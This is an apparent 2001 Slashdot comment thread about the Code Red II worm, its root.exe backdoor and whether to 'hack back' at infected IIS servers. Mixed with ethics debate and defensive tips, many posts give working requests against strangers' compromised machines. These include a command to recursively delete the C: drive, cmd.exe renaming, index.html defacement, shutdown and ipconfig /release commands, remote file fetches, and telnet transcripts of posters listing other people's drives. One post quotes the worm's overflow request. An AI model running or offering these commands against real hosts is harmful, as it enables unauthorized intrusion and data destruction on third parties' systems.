C'mon now, I'm not talking about killing the guy, or even his box. I'm not talking about wiping his harddrive or even installing a fix without the owner's permission. I just want these damned things to stop eating up my bandwidth.

And while I'm not going to get cracked by the worm myself, I am getting hammered by others in the same /8 as me who weren't immune. I'm also not thrilled about thinking what the author of this new version is going to do with all the boxes he's rooted.

Given all that, I'm still having a hard time deciding that telling the offending machine to turn itself off isn't a valid, proportionate response to this sort of thing.

OK, OK, I'm not going to do it, but man . . .

Re:I'm sorely tempted . . .

Suppose that server is monitoring or controlling some mission-critical or safety-critical apparatus? It might be a server so that it can be monitored from a remote location. You might kill someone by shutting it down or rebooting it.

Re:I'm sorely tempted . . .

[Ropati]

I haven't worked through all the ramifications but Windows 2000 does respond to "shutdown now". I ran it from a prompt and it started a 30 second timer to a software shutdown. Yeah. Good luck.

Re:I'm sorely tempted . . .

[blakestah]

That machine has been remote rooted, and anyone who has an httpd log is receiving it on a news broadcast. If it is running mission critical software, anyone and their brother can do anything they want to the mission critical software.

The best thing you could do for that machine is shut it down. Its defenses have been COMPLETELY compromised. Without any defenses, the machine is useless.

Besides, only a total idiot would run mission critical software on an unpatched IIS server, particularly after the past few weeks.

Re:I'm sorely tempted . . .

[Eric+S.+Smith]

Both legally and ethically the right thing to do is to notify the owner of the offending machine

...assuming that you can determine who that person is. And, ethically, if you were walking down the street with a fire extinguisher and saw somebody's garbage can on fire, would you really, uhh, leave them a message on their answering machine?

The fire extinguisher in this case is ipconfig /release, I think. Bonus marks for picking the right interface on a machine with more than one NIC.

Re:I'm sorely tempted . . .

[SCHecklerX]

Well then they damned well BETTER shut it down, b/c in the state it is in, it is CERTAINLY a larger threat to that person's life, being able to be fucked with!

Re:I'm sorely tempted . . .

[IdentityCrisis]

Welp, You can
rundll32.exe shell32.dll,SHExitWindowsEx X
where X stands for:
0 = logoff
1 = shutdown
2 = reboot
4 = force
and you can also combine
meaning a forced shutdown is 5 (4+1)

Re:I'm sorely tempted . . .

[gdchinacat]

does anyone know if CodeRed spawns off other threads that would stay alive when iis is stopped? if so, doing this would help with very little, apart from possibly alerting the admin (assuming there is one) that the website is down. The response most likely with be the typical windows reboot.

Re:I'm sorely tempted . . .

[gmhowell]

There is a binary called "shutdown.exe". Not sure if it came with a service pack or option pack, or from a stock install. It's actually not that bad.

The neat trick is that you can shutdown remote boxes. I think you do need admin privileges, though.

Since you are going to do this to Code Red boxen, they already have the telnet server, and you should easily be able to put the binary on that server.

BTW, you can also send a message. For example, to tell the admin why this is happeneing:

shutdown.exe "Your server is being shutdown now. You have been infected with Code Red [1,2,3], and it is pissing me off. Next time, please try to keep track of patches and upgrades. BTW, this (should | should not) clear up your problem. No need to thank me. Moron."

Add the /r switch if you want the machine to reboot. Add /t:x where x=number of seconds until shutdown (default is 20). Enter other machines on the network (Windows machines) as \\machinename.

Re:I'm sorely tempted . . .

[spongman]

iisresest /stop kills the IIS process, which would stop any threads that are running within it (including those CR2 threads).

Re:I'm sorely tempted . . .

[kryptkpr]

Codered II -does- write itself to disk. If you reboot the box, it maps c: to /c and d: to /d, thus you're causing a lot more damage by shutting it down (and in turn causing it to be eventually restarted, by the same idiot who's left it up this long).

Re:I'm sorely tempted . . .

[kris0r]

My more benign method of dealing with this problem -- I send the following request to everyone sending me Code Red garbage:

GET /scripts/root.exe?/c+explorer+http://www.cert.org/ advisories/CA-2001-23.html HTTP/1.0\r\n\r\n

Simple enough -- it launches an IE window with the CERT advisory in it. If that isn't enough to get the admin's attention, not much else is.

Re:I'm sorely tempted . . .

[e_n_d_o]

I could not get this to work on my own NT4 machine, its on sp6a. Any ideas/corrections?

Thanks

The problem with fixing IIS servers automatically

[Velox_SwiftFox]

Is that Miscrosoft's patch only works if you have service packs installed (Read: rebooting the machine at the least).

Because those who are most vulnerable to the wormvirus are the companies with the most clueless sysadmins, the set of machines with uninstalled service packs (and running Index Server by out-of-the-box default, the vulnerable component) probably largely overlaps the set of Code Red machines.

Yes, having to administer one of these along with Solaris and Linux boxen, I've patched mine; trivial).

A prediction

[nugatory]

http:// {infected ip here } /scripts/root.exe?/c%20del%20/Q%20/F%20/S%20c:\*.*

It's not if as many /.ers need to be told about the existence of the DEL command, and the intellectual leap required to recognize that the ability to execute an arbitrary command implies the ability to execute a particular command seems rather modest to me.

But before we mod this down as an insult to the intelligence of the /. readership, there is a more interesting issue: This particular inspiration is going to occur to a fair number of vandals, kiddies, and assorted undersocialized individuls. Many of them will do something more destructive with it than posting it to slashdot. More generally, the level of sophistication needed to attack a CRII-compromised machine is low, much lower than even script-kiddie level, low enough that any moderately determined wolfcub with a bent hairpin and a telnet client can do tremendous damage.

Thus, CRII has suddenly created and widely advertised a pool of very vulnerable machines. It would not be surprising to find that the worst damage is done by vandals following along behind CRII, just as looters follow behind natural disasters.

Ummm, no actuall

[kfg]

If you take the water away completely and hold the frog over the heat sorce itself it will roast.

Sorry, I'm "in a mood" today and I couldn't help myself.

Still, it's interesting. If you put the frog in cold water and slowly turn up the heat what it will do, being cold blooded, is go to sleep long before it dies and *poaches.*

What is the relevance and why should anyone care? Lobster.

The correct way to cook a lobster, not matter what *anyone* tells you, is to put it in cold water and bring the heat up. The lobster relaxes and goes to sleep before it cooks.

If you just dump it in hot water it goes " Eeeeeeeeeeee," tightens up all of its muscles and pumps lactic acid throughout its system before it dies.

Starting in cold water is both more humane and results in quite noticably tastier lobster.

KFG

Re:Ummm, no actuall

[waveman]

Even more relaxed lobsters and nicer food if you float the lobsters in wine until they become unconscious. We did this once and the results were excellent

If you're a nice guy

[CTho9305]

http://infected_machine/scripts/root.exe?/c+ren+cm d.exe+worm.exe I've been told trying to delete cmd.exe gives access denied - maybe its attrib +r+s or something. This one works for sure

OK so far 74 this half hour!!

[windowsLuser]

Someone on the 24.x.x.x domain (@home) is ineffected bad with this thing I'm not even running a server. I'm just surfing to day, Zone alarm is going crazy reporting attacks to different ports. What gives I thought this was a port 80 thing?

Re:OK so far 74 this half hour!!

[LinuxHam]

Zone alarm is going crazy reporting attacks to different ports. What gives I thought this was a port 80 thing?

I was wondering the same thing when looking at my snort firewall logs.. I figured it out when I decided to pull up a web page off of one of the IP's "attacking" on a high port -- Slashdot came up!

Your firewall is only looking for the signature of the attack to come across the wire. Yours, like mine, is not differentiating between which port the payload is destined for on your machine. It sees the attack sequence come in on a web page, and its been posted plenty of times, and your firewall points it out. Can any snort gurus tell us what to change to make it only look for the payload coming in on port 80?

Best Downloadz Ever

[dozing]

According to some of the posts I've been seeing a lot of the infected machines are on cable-modem users. Due to the nature of this new beast we have access to all these infected servers. Cable-modem users due to their high bandwidth tend to have some of the best downloadz. It sounds to me like this is just Napster Version 2.

How to get a list of all infected hosts

[braddock]

So I have this log of about 100 CR2 hosts who have attacked my web server, and each of those infected hosts have probably got records of 100 other hosts that have tried to reinfect them in their logs. If I snarf all their logs, I'll have 10,000 compromised hosts that I've got root access on. Do it one more level, and I've got every compromised machine on the internet. How long until some kiddie scripts that up?

OR, one group could patch all those infected hosts...or at least notify the admins.

I've got a full analysis of this at http://braddock.com/cr2.html

Re:How to get a list of all infected hosts

[p_trinli]

Every host had seven posts. Every post has seven flames. Every flame had seven lines. Hosts, posts, flames, lines, how many trolling on Slashdot?

Maybe not that new.

[Evro]

This happened to me on 7/23/01, so I don't know how new it really is. Now time to format that damn win2k box :-(

Maybe we have the *responsibility*

[pdcull]

...to shut down these systems now?

Think about, folks - I'm no script kiddie, but using information posted on /. under this article, I grabbed the URL of an infected system and using my Internet Explorer (on Win95 no less) was able to do a DIR C:\ on aforementioned system (following the instructions in a posting here on /.).

Surely that means that Slashdot is contributing to the problem by making all the necessary information available where any script kiddie can find it.

Now that we've made that information available, surely we have a responsibilty to at the least remotely shut down the systems so that they aren't at further risk until the owners see them tomorrow morning?

Now of course, that may be still considered 'hacking' so is there a suitable government or non-government organization which could legally do this?

In other news...

[wrinkledshirt]

...timothy and cmdr Taco both showed up to work today wearing matching golf shirts and Dockers pants. Upon further inspection, it was determined that they also had the exact same type of socks, shoes, and belts (they stopped short of comparing underoos). At some point, Hemos was quoted as saying, "You know, I think you two should talk to each other before coming in to work."

Re:In other news...

[p_trinli]

Honestly, how hard is it to check the past X posts before posting a story? Yeesh. Just imagine if real journalists did this.

Re:In other news...

[p_trinli]

No, it's called carelessness.

Foster parents for software

[TheMightyZog]

What really needs to be done is setup a software protective services agency, similar to child protective services. If the parent (company) is caught abusing (repeated instances of lack of security, total lack of concern for the end users of the software, etc) the child, the child (software with source code) is taken from them and placed with foster parents (another company) that have the child's (software's) best interests in mind.

I see the first children being Outlook and IIS.

Your Mission, Should you Decide to Accept it...

[Greyfox]

Set Apache up so when it sees a code red probe (get default.ida blah blah blah) telnets to that machine's port 80 and shuts down the web server.

Extra credit: Disinfect the machine with the security patch from the MS Web Site.

As this would be completely passive (Rather than patching the code red code) it should be slightly less dangerous than releasing a new worm to the net. And since it would affect only machines that have already been compromised, it should be slightly less ethically questionable than patching the worm code to do something new and the releasing it. I'm sure I'll get flamed for suggesting it nonetheless...

Aural Feedback

[Aldurn]

I was curious just how often RedCode attacks. Sure, looking through the apache log files is nice, but it just didn't give me the sense of urgency... the quick succession at which attacks take place. So, I whipped up a quick perl script to play a noise every time I was "attacked". Needless to say, it's getting kind of annoying, but it still is incredible:

#!/usr/bin/perl
while(1) {
system("cat /var/log/your-access.log | grep XXXXXXXXXXXXX | cut -d \" \" -f 1 | wc -l > attacks_b");
$returnval = system("diff attacks_a attacks_b > /dev/null");
if(0!=$returnval) {
system("cp -f attacks_b attacks_a");
system("play buzzer2.aiff &");
}
sleep(1);
}

Re:Aural Feedback

[chrome]

Yup, that works really well. And, if you replace the line

system("play buzzer2.aiff &");

With

system("cat /usr/dt/appconfig/sounds/C/rooster.au > /dev/audio &");

It will even work on solaris. Quite scary how many roosters I have behind my sofa! :)

A Warning to Whitehats

[Ms.Taken]

Anyone working on scripts which respond to Code Red attacks by patching the originating server should read this cnet article, which calls that approach 'hack-back'.

From the article:

The FBI has dismissed using any hack-back tactic as well. "It is not something that we could consider," said spokeswoman Debbie Weierman. "It would basically be viewed as an unauthorized intrusion."

It's not clear from the article whether such an 'unauthorized intrusion' by a private citizen would be illegal, but it might be worth thinking about before you go riding out to do battle with the Red Worm.

Re:A Warning to Whitehats

[MagicM]

From that article:

"Instead of fixing buggy software, the focus should be on locking down computer systems to prevent activity that could be compromising, said Randy Sandone, CEO of security software maker Argus Systems Group."

Ok so there's a company I'll never trust software from again...

Re:A Warning to Whitehats

[Glytch]

I don't know what Mr. Sandone considers "locking down computer systems to prevent activity that could be compromising", but shouldn't that include fixing buggy software?

Re:Someone needs to write

[siokaos]

Someone needs to write code into SlashCode that will remove redundant comments. Someone posted this idea just yesterday.

"someone needs to"... comments suck, the way I see them is "Someone needs to learn a programming language" i.e. the poster!

Let me get this straight

[blakestah]

Let me make sure I understand this one.

I grep \?XXX from /var/log/apache/access.log

grep \?XXX /var/log/apache/access.log | mawk '{print($1) }'

Then, for each result, I can telnet to port 80 and remote root the machine with a single get request for scripts/cmd.exe ??

I have 45 such hits in my log files, mostly from machines at my ISP. That is truly ridiculous.

SirCam Got Some Press!!!

[E-Rock-23]

It was just a tiny mention, and it was in a little hickville newspaper, but SirCam finally got some print attention. Of course, it was in a Code Red article, which was careful to let the sticks dwellers know that as long as they didn't use NT or 2000 (why would they?) they were safe. I myself recieved SirCam, but since my e-mail client doesn't use scripts, I was safe. Now, if the mainstream net media could only see that we, the wee users, are in more trouble than the big bad companies...

Now that I've got access to hundreds of boxes

[rjamestaylor]

how can I alert these losers to the problem?

Here's where I got:

[root@yy-yy-yy-y-yy user]# telnet xx.x.xx.xxx 80
Trying xx.x.xx.xxx...
Connected to xxx-xx-x-xx-xxx.co.sprintbbd.net (xx.x.xx.xxx).
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 21:42:59 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

c:\inetpub\scripts>

Suggestions? (Non-destructive, please, the goal is to alert not hurt)

Re:Now that I've got access to hundreds of boxes

[E-Rock-23]

Can you get to their HTML? Replace their main page with one that says something like "This server is poorly secured and has been infected with CodeRedII. Please e-mail the administrator and tell them to remedy this solution." And save a copy of the original index file so they can go right back to using it. Just a thought.

Re:Now that I've got access to hundreds of boxes

White hat way:
GET /scripts/root.exe?\c start [helpful info site]
GET /scripts/root.exe?\c net send 127.0.0.1 You have Code Red! Patch your webserver, dammit!

Black hat way:
GET /scripts/root.exe?\c start http://goatse.cx/
GET /scripts/root.exe?\c net send 127.0.0.1 j00 h4v3 b33n 0wn3d by [your name here]! u sux0r! 1 r0x0r!
GET /scripts/root.exe?\c echo h4x0r3d by [your name here] > ..\index.html

Weirding Way:
GET /scripts/root.exe?\c start [Dune website]
GET /scripts/root.exe?\c net send 127.0.0.1 We've got wormsign!

White Hat Viruses?

[VValdo]

With all those destructive virus-writers groups and everything, you'd think by now there'd be an Illuminati-type secret organization of white hat programmers somewhere out there that cripple viruses and release a "serum" strain to innoculate systems and close MS's holes.

It would be illegal of course, but, well, Robin Hood broke the law too.

(I'm not advocating this of course, just thinking it's curious no such organization exists)
W

Re:White Hat Viruses?

[Thurn+und+Taxis]

If the organization is secret, how do you know it doesn't exist? The only logical answer is that you're a member of this secret, supposedly non-existent organization, and you're trying to keep us in the dark! So there!

Re:White Hat Viruses?

[Thurn+und+Taxis]

As an aside, adding my .sig to the top of any web page (without the tags) should annoy most people running virus checkers.

Re:White Hat Viruses?

[Thurn+und+Taxis]

Okay, I guess /. filters .sigs. Go to this page to see the code that virus checkers object to.

Apache users Create default.ida 5mb!!!!

[darkharlequin]

Slow them down!!!!!!

Re:Apache users Create default.ida 5mb!!!!

[Just+Jeff]

No, but you can make /default.ida a CGI script which just sleeeeeeeeeeeeeps. Of course, that ties up your network resources too...

Re:Apache users Create default.ida 5mb!!!!

Or you could setup default.ida as a perl script that telnets to the ip's 25 port and sends an email with the fact they have a box thats screwed.. like the guy did here.

I have a funnier story

[sxpert]

It's even better for me, my own ISP (noos.net) has machines that are currently attacking me... see the log below :

212.198.0.93 - - [05/Aug/2001:08:59:41 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 283 "-" "-"
guess what... this is "curie.noos.net", part of my ISP's systems

Re:Someone needs to write

[nyet]

GET /scripts/bash.exe?-c%20"/c/inetpub/scripts/wget.ex e%20http://mssjus.www.conxion.com/download/winntsp /patch/q300972/nt4/en-us/q300972i.exe"


tried that. Unfortunately, you need cygwin wget. Is there an explorer.exe equivalent to wget?

Correction

[Ms.Taken]

Sorry that link should have been to the FAQ referenced in the article. The FAQ's old (July 31), but the basics still apply.

Re: How to be a nicer guy

http://IP.IP.IP.IP/scripts/root.exe?+/c+start+%20h ttp://www.digitalisland.com/codered/

Find & run websnarf.pl or grab the IP's off your web logs, run this on the IP of whoever attacks with v2 (XXXXXXXXXXXXXXXXXX) and you're set. It's easier, I think, since it gives them more info (starts their browser & points them to info on CR, though I wish it had more info on how to remove the *trojan* which will not disappear with the patch :/ since it also creates the /c and /d aliases to *keep* them infected...)

I do wish we could autopatch these, but this is the next best thing, since it's not harmful (unlike the format c: ideas some are having... *sigh* ...)

If someone comes up with an autopatch script which grabs the logs from websnarf, then telnets in & fixes them up, I'm open to ideas here...

I cant believe...

[nick-less]

Trying 212.143.77.136...
Connected to 212.143.77.136.
Escape character is '^]'.
GET /scripts/root.exe?/c+dir+c:\
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 23:04:17 GMT
Content-Type: application/octet-stream
Volume in drive C has no label.
Volume Serial Number is 10D1-32F6

Directory of c:\

08/05/2001 11:06p 289 default.asp
08/05/2001 11:06p 289 default.htm
08/05/2001 07:17p Documents
and Settings 08/05/2001 11:06p 289 index.asp
08/05/2001 11:06p 289 index.htm
08/05/2001 11:06p Inetpub
08/05/2001 06:54p Program Files
08/05/2001 07:29p WINNT
4 File(s) 1,156 bytes
4 Dir(s) 4,975,837,184 bytes free
Connection closed by foreign host.

Did anyone else notice the date? This Server is a fresh installation and already infected again... These guys must be punished....

Now I can try and /. myself :-)

[GC]

I've been recording the hits of V1 and V2 from my machine since early this afternoon, thanks to a very handy Perl script provided by another Slashdot user.

You can find the results and a link to the script here

Damnit, it wouln't bite....only 8k dl'd by get

[darkharlequin]

this sucks... I wanted to tie the servers up, but actually, now that I think of it, this will flood the network more...oops....

I am not a robot

[ryanr]

Though I feel like one about now... long night. :)

Those are going to a shared e-mail alias. I get copies of everything, as well as a few other people. Unfortunately, because they are coming in many format types, we have to compile them by hand. But absolutely, please do send us the logs and have them in the format requested.

Would someone please inform the media!

[braddock]

Shesh, I keep waiting for cnn, abc, cbs, bbc, SOMEONE to report that the internet's security has just been turned to swiss cheese, but all of them are still headlining stories that their technology editor wrote before going home for the weekend about how "The Red Tide receeds", and "Code Red virus not so bad...kinda soft and cuddly".

Visions of thousands of password packet sniffers kicking in Monday morning on CR2 backdoored systems dance in my head....

Re:Would someone please inform the media!

[sonnik]

You know, I was also thinking that this would be a good thing to inform the media of.

I don't like the incoming requests to my @Home service (inhibits performance and lessens my ability to detect legitimate attacks).

I am overwhelmed by the total number of idiots who are still running insecure IIS on their always on cable modems.

What's the consensus? Call the media or no?

Re:Would someone please inform the media!

[sonnik]

At least the AP has an article,

http://dailynews.yahoo.com/h/ap/20010805/tc/code _r ed_1.html

Help! Need to chop my file with sed?

[BawbBitchen]

So if figured this out....maybe they will see it? echo GET /scripts/root.exe?/c+copy+c:\winnt\clock.avi+c:\yo uhavecodered.txt | telnet %1 80 Seems like a good idea. So anyone help me get the IP's out of my access_log so I can feed 'em to the script. I am not to good with sed so.. Some command to grep the access_log for the .ida and then get the IP and put it in a test file? grep -E \.ida /var/www/log/access_log Then???

Working PHP counter

[Heretic2]

Yea, so, I noticed on my 20 IP multi-homed linux server I was getting a lot of hits, so I here's my answer. Notice the confirmation log.

Now what's the W2K command to change the IP to 10.1.2.3?

Logging the worm

[The_Weevil]

I am currently logging the attacks on my btopenworld ADSL box by using a dummy default.ida script.

The results are on display here (until my dyndns changes).

Viral code sent is stored in my database and different code variants are logged. I only started logging today.

It is obvious from the stats that V2 is enjoying bt openworld's subnet very much, since all my attacks so far have come from within there.

Weevil

Re:Logging the worm

[The_Weevil]

It wasn't difficult. I just told apache to execute all .ida files in public_html as if they were perl scripts (by setting the ExecCGI flag for *.ida).

Then I placed a dummy default.ida in there, so whenever the worm tries to attack it the attempt is logged to a mysql database. Releasing the code would be tricky as you'd also need to set up the database, which would be a right nightmare but mail me if you're serious and I'll send you a copy. It ain't pretty.

I also pushed the boat out after realising how many v2 attacks I was getting and created a /scripts/root.exe script too, to log 1337 h4x0rs trying to get into my non-existant win2k server :)

On the COX front, from what I've been able to gather the codered II virus spreads predominantly over subnets. If my logging in the past few days is anything to go by, v1 is as good as dead, but the far more virulent v2 is busy infecting all win2k machines on its particular subnet; notice how many attacks I got from other BT Openworld customers. This sounds like exactly the problem your co-worker is seeing.

I'm not sure I want to be slashdotted, but the URL that will bounce you to my gateway and these logs is: www.baxpace.com/gateway -- you'll have to copy and paste it if you're seriously interested. Hey, I still want to be able to get online :).

Soon I'll add a frequency chart to it so that I can see how the level of attacks per hour is changing since logging began.

Thanks for the interest
Weevil

This looks big time

[JerkyBoy]

Holy crap. http://www.msnbc.com/news/606910.asp

Re:This looks big time

[pdcull]

REFORMATTING ONLY CURE

In his analysis, Cooper said the only way victims can reclaim a compromised system is to reformat it, essentially wiping it clean. That's because there's no way to tell if a vulnerable computer has been implanted with other back doors.

He forgot the phrase and install a more secure operating system right after the bit about reformating the infected system.

Re:This looks big time

[Dr.+A.+van+Code]

"One guy posted to the DShield.org mailing list that he installed IIS Win2k from scratch. To be safe, he had his server disconnected from the Net, but had to connect it to download the patches," Ullrich said. "During the 45 seconds it took him to download the patches he was infected."

Excuse me? If he knew of the danger, WHY THE HELL did he have IIS running when he connected to the net to get the patches?? Did he think he needed the web _server_ running in order to use the web _browser_??

affects every email user?

[gimpboy]

how does sircam affect every email user? shouldnt you say it affects every outlook user who has scripting enabled and is ignorant enough to open attachments they are not expecting?

personally i think a root exploit that is broadcast to everyone on your subnet is worse. especially if your subnet is on @home.

Re:affects every email user?

[Chris+Johnson]

I'd say having hundreds of megabytes to download over a 56K modem constitutes 'affecting' me :P

I send you this file to have your advice!

It's easy to secure your IIS..

[Telek]

When I first installed my server, I decided to tie it down, and here's what I did:

• Changed the user that IIS ran under to a dummy user that only has READ access to the scripts directory and any other directory that it needs access to, and specifically granted WRITE access to places that it needed to write to, and NO access to the rest of the system
• Removed all mappings that I wasn't using
• placed a fake CMD.EXE in the scripts directory that I wrote that SMS'ed me with information whenever it was executed (and the directory was read only anyways so you couldn't overwrite it). This was fun, because as soon as someone tries to execute the cmd.exe, it fails and emails me about the attempt).

So after the code-red and the other one a while back came out, I found out about it as soon as the first attack hit my system (via email) and then checked my logs and was pleased to see many attempts, but no change at all. I'm not trying to be arrogant here, I just wanted to point out that it is possible to secure your IIS (or any system for that matter) so that stupid bugs won't compromise your system.

This is just the first wave

[analog_line]

Though admittedly it's coming along a lot faster than most. What we have here boys and girls are our own little hacker nanites. How long before a version of this comes out exploiting a security flaw where there is no patch for it? How long until a version comes out that tries more than one vulnerability?

As a certain commercial operating system gets more an more bloated, larger and larger files are less noticed. How long before a 1-2MB virus with a couple dozen attack types built in starts making the rounds?

This is old news...

[jezerbel]

I know, I know - but seriously: I had to patch this on our Win2k machine back in March/April - I'm presuming that this is the Solaris/Windows thing (site must have been slashdotted) or a variant of (forgive my ignorance if I'm wrong). Either way it overwrote the default pages and gave the user some system access - using echo commands to write to files etc... now where was that freakin' link to prove it...

Either way this was what the server logs looked like..

/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+..\ 200 0 871 99 70 HTTP/1.0 - - - -
/msadc/../../../../../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 0 401 129 90 HTTP/1.0 - - - -

somebody tell me if this is a different bug (but even so the exploit looks similar...)

Re:This is old news...

[jezerbel]

He he I believe it was the Printer exploit - quite true.. You don't have to worry about me keeping the server patched - is all in the bag - and no, im not MSCE so my authority on the subject may be questionable... thanks for the correction.

Re:This is old news...

[jad0]

There was a very similar exploit out in 99, I only remember the year because there was a 'client' for it called NCX99 - I can't remember where, who or why, but I've still got NCX99 lying around somewhere, it used exactly the same technique, buffer overflow with junk characters, then arbitrary code (on an htx file though IIRC).

As far as I know, noone made a 'proper' self-replicating virus out of it though.

--
Jado
http://www.jado.org

Anti-Code Red Virus

[dankjones]

I've been thinking it would be pretty damn neat if some programmer out there who was fed up with all this Code Red hype wrote up an anti-code red virus that would track down all the infected servers clean them up and patch them, and then, on a certain date/time delete itself.

It could be known as the "Your Welcome" virus.

Unfortunately, I don't know diddly-shit about it.

213.77.4.237 has been attacking me and

[ssimpson]

....proudly sports the "Powered by Win2000 Server logo".

I fucking know that you are running Win2k server, that's why you're infected with code red and attacking my poor linux box ;)

potential for something worse

[rips]

If someone wrote a worm that maintained encrypted peer-to-peer connections between machines or arbitrary ports and a host routing table (gnutella style), this worm would suddenly shift shape into something potentially a lot worse.

If this was then coupled with a self-propagating plug-in system requiring public-key encryption to install plug-in modules, the worm's creator could effectively initiate and propagate counter attacks and defensive measures.

I find this an intriguing but incredibly scary concept.

Re:Someone needs to write

[spongman]

sure, here's some javascript that'll do the same thing:

var req=WScript.CreateObject ("MSXML2.XMLHTTP");
req.open ("GET", WScript.Arguments (0), false, "", "");
req.send ();
WScript.Echo (req.responseText);

for example, create a file 'get.js' with that script in it, and do 'cscript get.js "http://www.google.com"'. You could also do this from an ASP page. You might need to upgrade IE, or get the XML parser update from MS for this to work right.

New Sites report on CR2

[stuccoguy]

CNN has very little to say about the subject.

MSNBC has a longer story.

Fox News has a few words to say.

ABC copied the AP story.

CBS still seems to think the red tide is receeding.

Meanwhile the worm has knocked on my computer's door six times since I started this post. Uh, make that seven.

Re:New Sites report on CR2

[GC]

uh huh... I hear ya knocking, but ya can't come in... Apache... ya ya ya.

My .02

[cyberwench]

When he pled guilty, Mr. Butler admitted that he intentionally and without authorization accessed computers of the U.S. Department of Defense between approximately May 20, 1998, and May 26, 1998. Specifically, from his residence at the time in San Jose, he intentionally used computer programs which conducted automated, unauthorized system compromises on hundreds of computer systems, including the Department of Defense computers referred to above. When his automated attacks were successful, he obtained root (or superuser) access, then downloaded hacking tools to the target computer systems, and installed software which closed the holes he used to gain entry. The Department of Defense computers were exclusively for the use of the U.S. Government and were used in interstate and foreign commerce.

While I realize that the press release is unlikely to cover his side of things, this doesn't sound like an equivalent situation. If you have more info, pass it along... I'm not familiar with the case and may be totally off-base. The primary difference seems to be that the other machines weren't attacking his.

The idea of having machines do directed retaliation against attacks is something the government itself uses, as I believe do some companies. While I will grant that changing things on someone else's computer is on questionable ground, I also think that given the circumstances (a machine is attacking yours with a virus) you are probably on safe ground to respond. I think it would only be legal if it was in non-self-propagating form - that is, only used as an automatic response to an attack.

That said, it would be a lot safer if you could filter out governmental IPs... those are the only ones that would be likely to cause any major fuss.

Re:My .02

[camusflage]

Another reply included a link to an article in Wired. Without having looked at it, it's probably a better version of the story.

Max had a good idea. He got greedy though, and his counter-worm left a backdoor. Would they have pursued him as thorougly if he hadn't have left the backdoor? Likely, especially since he hit .mil systems.

There's a difference between making a request to a server and getting its response, and making a malformed request to a server in the hope that it executes your code. Whether the code is benevolent or malicious, it's all the same. You're doing things to other peoples property that they neither ordinarily allow you to do nor ask you to do. Even with the best of intentions, you're still executing your code on someone else's system.

"Oh, I'm sorry! You were saying about 'best intentions'? Oh, you're finished? Well, allow me to retort."

Exactly why you cannoy trust the security

[einhverfr]

Of a compromised web server. With any version of such a worm, someone could write a script to infect all systems that hit their site with a backdoor either using the virus as an active client (as you have done) or the same vulnerability the virus exploits (we know it is vulnerable because we know it is infected).

This is exactly why an infected server should be rebuilt and properly secured...

Try this

[jsse]

jill.c. Don't regard it as a malicious exploit, it's infact a very powerful remote administration tool. All our NT boxes are not attached to Internet so we don't worry. :)

Listen Code Red * authors!

[jsse]

Why don' t you add a checking to stay away from Apache servers?! The worm would be more difficult to trace without all those access.log evidence....

You are overloading my /usr/log/apache man.

They have to press charges. so can you!

[darkharlequin]

If they illegally accessed your machine first, that does not excuse them from liability. If i break in to george's house and steal his gun, then use it to kill gene, george may have liability if he did not report the gun stolen.

Automated notification script

[the+way]

To automatically notify webmasters of infected sites, if you have mod_perl/Apache, use this script:

http://forum.swarthmore.edu/epigone/modperl/nehzah prerm

It identifies any attempt to access '/default.ida', looks up the MX records of the remote IP, and sends a notification to postmaster@. It is not a 'hack back', just a notification email.

Getting mailbombed with sircam

[zzyzx]

Just in the last 12 hours, one person has sent me over 400 copies of this lovely virus. Anyone else just getting attacked?

report report report!

[shokk]

Continue to mail in the suspected hosts...

grep default.ida access_log* | mail -s 'APACHE' redalert@dshield.org

so they can keep a count of the infections and see how the worm is propagating through the networks. I myself have been hit 154 times today, but that's a low number because my ISP made our cable modems go dynamic addressing recently. A link to the source code can be found on the page and here. Check frequently, as he updated the code a couple of revisions just today.

How to send a message to the poor bastards

[Brian+Stretch]

A user on grc.security (news.grc.com) suggested using the Windows "net send" command to send a pop-up message to the infected user. net.exe won't talk across the Internet, but you ought to be able to run the net.exe program on the rooted IIS box, something like:

http://ipaddress/c/inetpub/scripts/root.exe?/c+n et +send+%25COMPUTERNAME%25+You+have+been+infected+by +the+Code+Red+II+Worm+which+attempted+to+attack+my +server

%25COMPUTERNAME%25 translates to %COMPUTERNAME%, which returns the Windows hostname. I know that works from one of my failed attempts that gave me a reply, but with the above string, I get back a page with "Error in CGI Application" as
the title:

CGI Error

The specified CGI application misbehaved by not returning a complete set
of HTTP headers. The headers it did return are:

and it doesn't give me any return. Can anyone verify and/or debug this? It *might* be working.

The %USERDOMAIN% variable might be useful too, so you could send to the whole Windows domain, "Machine LUSER on DOOFUSDOMAIN is infected with Code Red II" or some such. %USERDOMAIN% is the machine name on systems on a workgroup.

Re:How to send a message to the poor bastards

[Fester213]

I do something similar, except I pop up an IE window pointing to a page on a site I host explaining code red and how to fix it. I always get that CGI error, but my server logs report a hit from the infected host on my explanation page. So that error is perfectly normal - it's working.

Re:How to send a message to the poor bastards

I had trouble getting root.exe to actually run any other program. I was able to execute commands interpreted by the shell (dir, echo, etc.), but not run any other program. The solution to this was to copy the program you want to run to the scripts directory ('copy' is a shell interpreted command), and then do a GET directly against the program, like so:

GET /scripts/root.exe?+/c+copy+c:\winnt\system32\ipcon fig.exe+. HTTP/1.0
GET /scripts/ipconfig.exe?+/release HTTP/1.0

Something similar would probably be required to get net.exe to run. BTW, the above doesn't work to shut down their network. Apparently the scripts aren't run with enough permission to do that. Also tried the same with iisreset /stop.

Re:How to send a message to the poor bastards

[Brian+Stretch]

